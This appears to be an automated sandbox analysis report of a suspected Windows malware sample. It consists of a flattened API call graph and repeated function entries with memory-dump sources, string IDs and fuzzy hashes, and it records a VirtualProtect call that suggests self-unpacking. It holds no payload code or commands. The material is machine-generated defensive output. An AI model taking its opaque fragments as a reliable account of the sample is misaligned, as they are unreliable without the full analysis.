41bebb __FF_MSGBANNER 42 API calls 14703->14705 14704->14701 14709 41790f _strlen 14704->14709 14706 417801 14705->14706 14706->14704 14707 417813 14706->14707 14707->14701 14799 419c22 14707->14799 14709->14701 14711 417945 WriteFile 14709->14711 14711->14701 14712 41783f GetModuleFileNameW 14713 417860 14712->14713 14716 41786c _wcslen 14712->14716 14714 419c22 __NMSG_WRITE 42 API calls 14713->14714 14714->14716 14715 415c12 __invoke_watson 5 API calls 14715->14716 14716->14701 14716->14715 14808 417075 GetModuleHandleW 14717->14808 14721 41bec7 14720->14721 14723 41bed1 14721->14723 14727 414403 14721->14727 14723->14692 14733 4167c8 GetLastError 14727->14733 14729 414408 14730 415c64 14729->14730 14786 415c37 DecodePointer 14730->14786 14747 4166a3 TlsGetValue 14733->14747 14736 416835 SetLastError 14736->14729 14739 4167fb DecodePointer 14740 416810 14739->14740 14741 416814 14740->14741 14742 41682c 14740->14742 14755 416714 14741->14755 14768 41444c 14742->14768 14746 416832 14746->14736 14748 4166d3 14747->14748 14749 4166b8 DecodePointer TlsSetValue 14747->14749 14748->14736 14750 416f56 14748->14750 14749->14748 14754 416f5f 14750->14754 14752 4167f3 14752->14736 14752->14739 14753 416f7d Sleep 14753->14754 14754->14752 14754->14753 14774 41cf30 14754->14774 14785 417360 14755->14785 14769 414457 HeapFree 14768->14769 14773 414480 __dosmaperr 14768->14773 14770 41446c 14769->14770 14769->14773 14771 414403 _setvbuf 43 API calls 14770->14771 14772 414472 GetLastError 14771->14772 14772->14773 14773->14746 14775 41cf57 14774->14775 14776 41cf3c 14774->14776 14778 41cf6a HeapAlloc 14775->14778 14781 41cf91 14775->14781 14783 417a10 DecodePointer 14775->14783 14776->14775 14777 41cf48 14776->14777 14779 414403 _setvbuf 44 API calls 14777->14779 14778->14775 14778->14781 14780 41cf4d 14779->14780 14780->14754 14781->14754 14784 417a25 14783->14784 14784->14775 14787 415c4c 14786->14787 14792 415c12 14787->14792 14789 415c63 14790 415c37 _setvbuf 5 API calls 14789->14790 14791 415c70 14790->14791 14791->14692 14795 415ae9 14792->14795 14794 415c24 GetCurrentProcess TerminateProcess 14794->14789 14796 415b08 ___report_gsfailure 14795->14796 14797 415b26 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14796->14797 14798 415bf4 ___report_gsfailure 14797->14798 14798->14794 14800 419c30 14799->14800 14801 419c37 14799->14801 14800->14801 14806 419c58 14800->14806 14802 414403 _setvbuf 45 API calls 14801->14802 14803 419c3c 14802->14803 14804 415c64 _setvbuf 6 API calls 14803->14804 14805 417834 14804->14805 14805->14712 14805->14716 14806->14805 14807 414403 _setvbuf 45 API calls 14806->14807 14807->14803 14809 417089 GetProcAddress 14808->14809 14810 417099 ExitProcess 14808->14810 14809->14810 14812 4166e1 DecodePointer 14811->14812 14813 4166f0 14811->14813 14812->14813 14814 416701 TlsFree 14813->14814 14815 41670f 14813->14815 14814->14815 14816 41b486 DeleteCriticalSection 14815->14816 14817 41b49e 14815->14817 14818 41444c _free 45 API calls 14816->14818 14819 41b4b0 DeleteCriticalSection 14817->14819 14820 4169a3 14817->14820 14818->14815 14819->14817 14820->14575 14830 416691 EncodePointer 14821->14830 14823 4170d2 __init_pointers __initp_misc_winsig 14831 4187e8 EncodePointer 14823->14831 14825 416a55 EncodePointer EncodePointer EncodePointer EncodePointer 14826 41b420 14825->14826 14827 41b42b 14826->14827 14828 41b435 InitializeCriticalSectionAndSpinCount 14827->14828 14829 416a94 14827->14829 14828->14827 14828->14829 14829->14623 14829->14624 14830->14823 14831->14825 14835 4171b8 14832->14835 14834 41731f 14836 4171c4 _setvbuf 14835->14836 14856 41b59a 14836->14856 14838 4171cb 14839 4171f6 DecodePointer 14838->14839 14845 417275 14838->14845 14841 41720d DecodePointer 14839->14841 14839->14845 14854 417220 14841->14854 14842 4172f2 _setvbuf 14842->14834 14865 4172e3 14845->14865 14846 4172da 14848 4170a0 _doexit 3 API calls 14846->14848 14849 4172e3 14848->14849 14850 4172f0 14849->14850 14870 41b4c1 LeaveCriticalSection 14849->14870 14850->14834 14851 417237 DecodePointer 14864 416691 EncodePointer 14851->14864 14854->14845 14854->14851 14855 417246 DecodePointer DecodePointer 14854->14855 14863 416691 EncodePointer 14854->14863 14855->14854 14857 41b5c2 EnterCriticalSection 14856->14857 14858 41b5af 14856->14858 14857->14838 14871 41b4d8 14858->14871 14860 41b5b5 14860->14857 14861 417342 __amsg_exit 44 API calls 14860->14861 14862 41b5c1 14861->14862 14862->14857 14863->14854 14864->14854 14866 4172c3 14865->14866 14867 4172e9 14865->14867 14866->14842 14869 41b4c1 LeaveCriticalSection 14866->14869 14921 41b4c1 LeaveCriticalSection 14867->14921 14869->14846 14870->14850 14872 41b4e4 _setvbuf 14871->14872 14873 41b50a 14872->14873 14874 417964 __FF_MSGBANNER 44 API calls 14872->14874 14881 41b51a _setvbuf 14873->14881 14896 416f11 14873->14896 14875 41b4f9 14874->14875 14877 4177b5 __NMSG_WRITE 44 API calls 14875->14877 14882 41b500 14877->14882 14879 41b53b 14884 41b59a __lock 44 API calls 14879->14884 14880 41b52c 14883 414403 _setvbuf 44 API calls 14880->14883 14881->14860 14885 4170a0 _doexit 3 API calls 14882->14885 14883->14881 14886 41b542 14884->14886 14885->14873 14887 41b575 14886->14887 14888 41b54a InitializeCriticalSectionAndSpinCount 14886->14888 14890 41444c _free 44 API calls 14887->14890 14889 41b55a 14888->14889 14895 41b566 14888->14895 14891 41444c _free 44 API calls 14889->14891 14890->14895 14893 41b560 14891->14893 14894 414403 _setvbuf 44 API calls 14893->14894 14894->14895 14901 41b591 14895->14901 14899 416f1a 14896->14899 14898 416f50 14898->14879 14898->14880 14899->14898 14900 416f31 Sleep 14899->14900 14904 415170 14899->14904 14900->14899 14920 41b4c1 LeaveCriticalSection 14901->14920 14903 41b598 14903->14881 14905 4151ed 14904->14905 14917 41517e 14904->14917 14906 417a10 _malloc DecodePointer 14905->14906 14907 4151f3 14906->14907 14908 414403 _setvbuf 44 API calls 14907->14908 14919 4151e5 14908->14919 14909 417964 __FF_MSGBANNER 44 API calls 14909->14917 14910 4151ac HeapAlloc 14910->14917 14910->14919 14911 4177b5 __NMSG_WRITE 44 API calls 14911->14917 14912 4151d9 14914 414403 _setvbuf 44 API calls 14912->14914 14913 417a10 _malloc DecodePointer 14913->14917 14916 4151d7 14914->14916 14915 4170a0 _doexit 3 API calls 14915->14917 14918 414403 _setvbuf 44 API calls 14916->14918 14917->14909 14917->14910 14917->14911 14917->14912 14917->14913 14917->14915 14917->14916 14918->14919 14919->14899 14920->14903 14921->14866 14923 41cfc7 EncodePointer 14922->14923 14923->14923 14924 41cfe1 14923->14924 14924->14681 14928 413832 14925->14928 14927 41387b 14927->14683 14929 41383e _setvbuf 14928->14929 14936 4170b8 14929->14936 14935 41385f _setvbuf 14935->14927 14937 41b59a __lock 45 API calls 14936->14937 14938 413843 14937->14938 14939 41374b DecodePointer DecodePointer 14938->14939 14940 413779 14939->14940 14941 4137fa 14939->14941 14940->14941 14953 417042 14940->14953 14950 413868 14941->14950 14943 4137dd EncodePointer EncodePointer 14943->14941 14944 4137af 14944->14941 14947 416fa2 __realloc_crt 49 API calls 14944->14947 14948 4137cb EncodePointer 14944->14948 14949 4137c5 14947->14949 14948->14943 14949->14941 14949->14948 14986 4170c1 14950->14986 14954 417062 14953->14954 14955 41704d 14953->14955 14956 414403 _setvbuf 45 API calls 14955->14956 14957 417052 14956->14957 14958 415c64 _setvbuf 6 API calls 14957->14958 14959 41378b 14958->14959 14959->14943 14959->14944 14960 416fa2 14959->14960 14964 416fab 14960->14964 14962 416fea 14962->14944 14963 416fcb Sleep 14963->14964 14964->14962 14964->14963 14965 41c5b3 14964->14965 14966 41c5c9 14965->14966 14967 41c5be 14965->14967 14969 41c5d1 14966->14969 14980 41c5de 14966->14980 14968 415170 _malloc 45 API calls 14967->14968 14970 41c5c6 14968->14970 14971 41444c _free 45 API calls 14969->14971 14970->14964 14985 41c5d9 __dosmaperr 14971->14985 14972 41c616 14973 417a10 _malloc DecodePointer 14972->14973 14975 41c61c 14973->14975 14974 41c5e6 HeapReAlloc 14974->14980 14974->14985 14976 414403 _setvbuf 45 API calls 14975->14976 14976->14985 14977 41c646 14978 414403 _setvbuf 45 API calls 14977->14978 14981 41c64b GetLastError 14978->14981 14979 417a10 _malloc DecodePointer 14979->14980 14980->14972 14980->14974 14980->14977 14980->14979 14982 41c62e 14980->14982 14981->14985 14983 414403 _setvbuf 45 API calls 14982->14983 14984 41c633 GetLastError 14983->14984 14984->14985 14985->14964 14989 41b4c1 LeaveCriticalSection 14986->14989 14988 41386d 14988->14935 14989->14988 16159 40b66e 16160 40b6ac 16159->16160 16163 40b709 16160->16163 16164 40b7d4 16163->16164 16165 40b9b9 16164->16165 16168 40b9a7 16164->16168 16165->16165 16169 40b9ca VirtualProtect 16168->16169 16171 40b9fd 16169->16171 16172 40d7bc ExitProcess 16171->16172 14990 40b9a7 14991 40b9ca VirtualProtect 14990->14991 14993 40b9fd 14991->14993 14994 40d7bc ExitProcess 14993->14994

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 0040B3A9 Relevance: 51.3, APIs: 2, Strings: 27, Instructions: 544COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$HJED$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1824788938
                                                                                                                                                      • Opcode ID: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                                                                                                      • Instruction ID: 92b41a86a38d0950ceaafc42da025f647756d5826f6a67780238649d31adf876
                                                                                                                                                      • Opcode Fuzzy Hash: fb009bf12fba860dd90a1fca2580a9de3574f5c8bef45c0561a189046184be70
                                                                                                                                                      • Instruction Fuzzy Hash: 111258A2D042549BF7208B24DC45BEB7B78EF91310F1481FAD84D66281D67D1FC68BAB
                                                                                                                                                      Function 0040B5B8 Relevance: 51.1, APIs: 2, Strings: 27, Instructions: 372COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 2YQ$4>85$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1705831375
                                                                                                                                                      • Opcode ID: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                                                                                                      • Instruction ID: b4819d296ad88a352d89a36c323faf44c94428e0c63bd935716a99660375177f
                                                                                                                                                      • Opcode Fuzzy Hash: 9179c622394c6dd952b2aaf50aca898e1caa17e1effd9207b73f44d9658fafab
                                                                                                                                                      • Instruction Fuzzy Hash: 01D145A2D082949BF7218624DC857EB7B79DF91310F1481FED44D66281D27E0FC68B67
                                                                                                                                                      Function 0040A96E Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 549memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                                                                                                      • Instruction ID: 31348504180dde6f2db56645b78a9417e8ac1ec904f0fb92e4b74cabad837206
                                                                                                                                                      • Opcode Fuzzy Hash: 233cec776356fd29b043981c593b48f861d9e98a0ef1bde1cbff54f0f26c5d6e
                                                                                                                                                      • Instruction Fuzzy Hash: CE1269E2D082549BF7208624DC85BEB7B79EB91310F1481FAD84D66281D27D4FC6CBA7
                                                                                                                                                      Function 0040AF5C Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 488COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                                                                                                      • Instruction ID: c211d26a15be80cd6d6061afdc2ec0d619a11bf4a02e20cf0df1070803d10200
                                                                                                                                                      • Opcode Fuzzy Hash: d5368f72dc26f51ba87488d6a5a194e7ddb87a056d74db15df06ca2c22eae912
                                                                                                                                                      • Instruction Fuzzy Hash: F40249A2C082549BF7218624DC857EB7B78EF91310F1481FAD84D66281D27D5FC6CBA7
                                                                                                                                                      Function 0040AF64 Relevance: 49.5, APIs: 2, Strings: 26, Instructions: 487COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                                                                                                      • Instruction ID: c4181e04a6996f4a4ec10402a5543215efd0a88869ad37b10ba3953f19293162
                                                                                                                                                      • Opcode Fuzzy Hash: eff81358ff4d72600424c43294880e2fd500d6dc6d11f15188a328bbf02ad914
                                                                                                                                                      • Instruction Fuzzy Hash: 7C023AA2C082549BF7218624DC857EB7B78DB91310F1441FAD84D66282D27D5FC6CBA7
                                                                                                                                                      Function 0040B077 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 448COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                                                                                                      • Instruction ID: c903f80ca669c1afc00443ee636d1640197b0a82a322bb41a1c8637baa7919a8
                                                                                                                                                      • Opcode Fuzzy Hash: 07c80f366c9e708be5f88d6d89cf683c2d416466354dedf7765eb4a2492a2750
                                                                                                                                                      • Instruction Fuzzy Hash: A5F168A1C082949BF7208724DC45BEB7B78EF91310F1481FAD84D66281D27D5FC68B6B
                                                                                                                                                      Function 0040B08B Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 440COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
